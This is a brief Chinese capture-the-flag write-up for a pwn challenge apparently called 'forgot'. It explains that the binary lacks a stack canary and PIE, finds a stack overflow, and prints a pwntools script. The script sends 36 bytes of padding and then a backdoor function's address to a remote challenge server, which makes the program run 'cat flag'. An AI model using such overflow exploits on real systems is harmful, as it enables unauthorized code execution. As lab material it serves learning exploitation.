点击下载
没有canary,可以随便溢出
没有PIE。可以随便使用后门函数
可以看到有两个溢出点
第一处限制了输入大小,我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以
接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了
from pwn import * io = remote('111.200.241.244',56240) # io = process("./forgot") flag_addr = 0x080486CC io.recv() io.sendline("kk") io.recv() payload = "a" * 32 + "a" * 4 + p32(flag_addr) io.sendline(payload) io.interactive()
得到flag